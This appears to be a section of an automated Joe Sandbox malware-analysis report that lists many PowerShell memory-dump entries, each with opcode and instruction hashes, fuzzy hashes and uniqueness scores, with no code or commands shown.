                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1a1ade97447b46a46a90c8bc27da3c8485472f87f097dc6bb7befd00a94c370b
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 40ba27f98dbb26ae1491ff5d45ca4e484dc0987fc9ad22659888f3278d4a81e9
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a1ade97447b46a46a90c8bc27da3c8485472f87f097dc6bb7befd00a94c370b
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15E0E579E0451ACFCF14EB94E481CEDB371AF88294B0284D2DD61AB365DB74ED06CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 93fd3b19465a3fd86925ad9a98ae0d727ce3f43371fa3a1b65dd0ba9c60489ae
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 23305a449d8c175cf9aefe6d8aa6fa2a8cc8913c3f90e4735ae175d03a6a3e9d
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93fd3b19465a3fd86925ad9a98ae0d727ce3f43371fa3a1b65dd0ba9c60489ae
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AE0E574A0024ACFDB54EF94C596AADBBB2AF88304F608524D802D7395CB34AD02DB40
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7d5bb52cf313a27e05a7620d8a806bc155cad68881f3bb9928bf07c81f1b012d
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 9206f66bbb98653f2e59b7cd48c884a12675f005c65b1c9d1e04cfb787ce8a58
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d5bb52cf313a27e05a7620d8a806bc155cad68881f3bb9928bf07c81f1b012d
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFD05E352001109FC701EB68E94CD957BE9EF4C355B0240A9FA098B322CF35AC008B91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 22f4da7341964ae74d7e1189ef92ad00deee07aaa26f45cfc32fd600aeb6c9fc
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 53b21c618b2c838b5579afc7d15599fb547b0c3cfc0e4c119e1df928fdac675b
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22f4da7341964ae74d7e1189ef92ad00deee07aaa26f45cfc32fd600aeb6c9fc
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69E0677594424ECFEB40EF90D95A7ADBBB2BF44305F600519D102E6680CB781946DF84
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9e5446e5b005cf500c6f1ddad254fe740f1e35be90a31fef12f8d846c1b304f5
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7bf616dcee3871f79b458d21d7b73459add24aba6848bf38ea6d2860d9e53aa6
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e5446e5b005cf500c6f1ddad254fe740f1e35be90a31fef12f8d846c1b304f5
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58C01238200A70CBCB249A28E04868A73F1BB48A10F00450AD44283B40C7B9EC81CA80
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: df49c6f2fb6b92fae764d0898bdf2334ab5be29eed8c9a6dbb31d442ecfcb344
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e2b0090a9534f49e1688b449003fdbf54ecf93c3769c396cce7c2ed1def09da4
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df49c6f2fb6b92fae764d0898bdf2334ab5be29eed8c9a6dbb31d442ecfcb344
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ADB0123374801047054C154A701806CF337DAD02762150033E30AC51108A150E278140
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 46091221cb5bbab1d8053f43da94c30ed90afa1070c342ba987dcb05499750cf
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a99290c0172f3816a229c3e34850f74385173b7da487f611413a25eb9078fb42
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46091221cb5bbab1d8053f43da94c30ed90afa1070c342ba987dcb05499750cf
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55B0123374C010470544124A704806CF367DAD03762650023E30AC55008A254D674180
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: "$@
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1136454570
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f17c3920bcdac62079e2c4feb1edb391fee379f414b6664d00341db783e2c005
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 759a5db6b0f23ed91cf18ee8ce525a2b1027e894e42c120779f130fa2a86fb91
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f17c3920bcdac62079e2c4feb1edb391fee379f414b6664d00341db783e2c005
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01229F34B002059FDF28EBB4D49466EB7F2AFC8204F15842AD64A9BB94DF35DC06CB91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: Xc4l$\v4l
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1211493696
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f789b06b0bcd8a8f97e8ce2c8c5a4dfb39e4584d87a2c1faf8389515f78085c5
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 84377253d8fa4c58a5496099be1c4108256be1da9837899e287447841afd0bdb
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f789b06b0bcd8a8f97e8ce2c8c5a4dfb39e4584d87a2c1faf8389515f78085c5
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E912AD34B046098FDB04EF78C894AAEB7F6EF89248B1584A9D605DF365DB71EC01CB91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b676ca64141a76c60fd5ae3b6da2aaa4da9f01cab2c521b073aafcaffc02caff
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e42f263a5788159ebbd1ca250bb6deb591a7c5c7805848e7b2df04fa08c15c51
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b676ca64141a76c60fd5ae3b6da2aaa4da9f01cab2c521b073aafcaffc02caff
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5825974F002199FDB14EF64D8446AEB7F2AF88304F1085AAD90AAB355DF349E85CF91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: KfMj^
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-358021004
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e8841e41cf9afa9e7de65cdaf590dd8dc69c293db0f2d2f881a4424420fd055f
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 62c5d9523e2fbe2cded07999b9cb1cc838612a8b8949189af14596708806af13
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e8841e41cf9afa9e7de65cdaf590dd8dc69c293db0f2d2f881a4424420fd055f
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5EF1A134B042099FDB14DBA4D994BAEBBF2EF88304F158069D906AB795DF34EC05CB61
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5109bf8261dca82e66e6a463ac6942fc00828466c1ab14606f01a7b98f555f74
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 417d1a7a31fe6adb73d5cc0cdd8f343aac7fe8c2e523b89a9ce229a6edebd7ea
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5109bf8261dca82e66e6a463ac6942fc00828466c1ab14606f01a7b98f555f74
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3126B30A00B498FDB14DFA5C5446AEBBF2BFC9308B158529D446DB758EB74AD0ACB81
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a7ea34ab551c53b9de009c3331d611db8822fff2b29048609d856b688701f93c
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d2029358e587013d24410212bb0e743028c66399fc2094031e3522111e145a93
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7ea34ab551c53b9de009c3331d611db8822fff2b29048609d856b688701f93c
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79E16B74E002198FDB24EF64D8447AEBBF2AF89304F1185AAC509AB355DF349E85CF91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2a8be52324645cfeb504644eff7d4d74b81b03af2fa569f195a9404f7aa7c25e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e6c33d01cdd8450c6e0b8c6a7bb8d5890808c0be1086bee85584f2aeb8137ad0
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a8be52324645cfeb504644eff7d4d74b81b03af2fa569f195a9404f7aa7c25e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CCD1E274B00205AFDB18DFA8D954ABEB7F2AFC8208F15806AD9429B795DF35DC01CB61
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8a718fdfc5d78c4e4bd81e4ce9072d067ce7caaa0ec18c55f4b816eef5968c01
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: fd56c6f0294748983a3e3dd21b3e745e8164fa41e0f00537013c29a1aa9e1057
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a718fdfc5d78c4e4bd81e4ce9072d067ce7caaa0ec18c55f4b816eef5968c01
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FBC1C030B04205AFDB14DF74D880A6AB7F3AF85204F15C46AD909CBB95DB35ED46CBA1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 08ff0abae835f6e21cb1d361a6192f4bf255ce3e5e65e4037ac0c3abecf1f497
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 74ab6d7fbf396db75f237d8a4971b3e6cd4baa493a751a43e5d43104ca9df17b
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08ff0abae835f6e21cb1d361a6192f4bf255ce3e5e65e4037ac0c3abecf1f497
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6071D475B00204AFEB24DB74D8686AEB7F6AFC8204F16842AE902D7794DF35DC05CB60
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4d36aaf4c6c0ff0a0bea5402152115e3cd4593609d11cb697f798210f8febc62
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: aeaed29ed3b9664d344bc699eea7a50b8d6255be1acd5fdfc28dd7e4828e3d91
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d36aaf4c6c0ff0a0bea5402152115e3cd4593609d11cb697f798210f8febc62
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD817074B00301AFDB24DB759955B2B73E6AFC4208F16842ED9468BB94DF34EC06CB61
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ae374568347c2836a1030a39a0fc1a08cfde42651d215b72dd2f83c91c85a7d2
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 34906fdd5f42a18b07bc11ccddafc1fe9bddb335a5979d12f30e017441fbe9cc
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae374568347c2836a1030a39a0fc1a08cfde42651d215b72dd2f83c91c85a7d2
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E4192B5E002698FDB10DFA5C848A6ABBF1BF8C310F068569D855E7361E770EE41CB90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: `oDk$`oDk$`oDk$`oDk
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3378734023
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9fa8ff621b4dc666c8ae724d37640e5bf119f3e75c60a02eee79748fb06776fc
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3f1b1b5cd93e630792c1bf17096eabaf2b503074196ca7f98839adde319354b3
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fa8ff621b4dc666c8ae724d37640e5bf119f3e75c60a02eee79748fb06776fc
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3702DC30B042068FDB04EB68C588A6EB7F2FF88218F16C569D5099B369DB74EC45CB91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: DK4l$Xc4l$lj$lj
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3905690326
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6453b386a931daaf4b918d6e321cf6999487f20c051c13dbd46fa6ecdeaae5e7
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7f2f1f88f47b7061ac45f0d975254a146effa4ed18d438dc431b202c9de95590
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6453b386a931daaf4b918d6e321cf6999487f20c051c13dbd46fa6ecdeaae5e7
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6A16678B00605CFCB58DF64D4949AEB7F2FF8921472585A9E90A9B361DB31EC42CF90
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: =Fj^$Fj^$Fj^$Fj^
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-886896601
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5d440fd828b92d6601b671a72c4e4a9c55502790c3f80da21a5bb91afced7af5
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f319889a1f95bb367d0abe6829244ece6e2933184930f255073242039160bc6a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d440fd828b92d6601b671a72c4e4a9c55502790c3f80da21a5bb91afced7af5
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1451EC5290E3D15FD32767388CBA2953F71CE271A4B1A09E3C0C1CF1A3E959595BD3A2
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

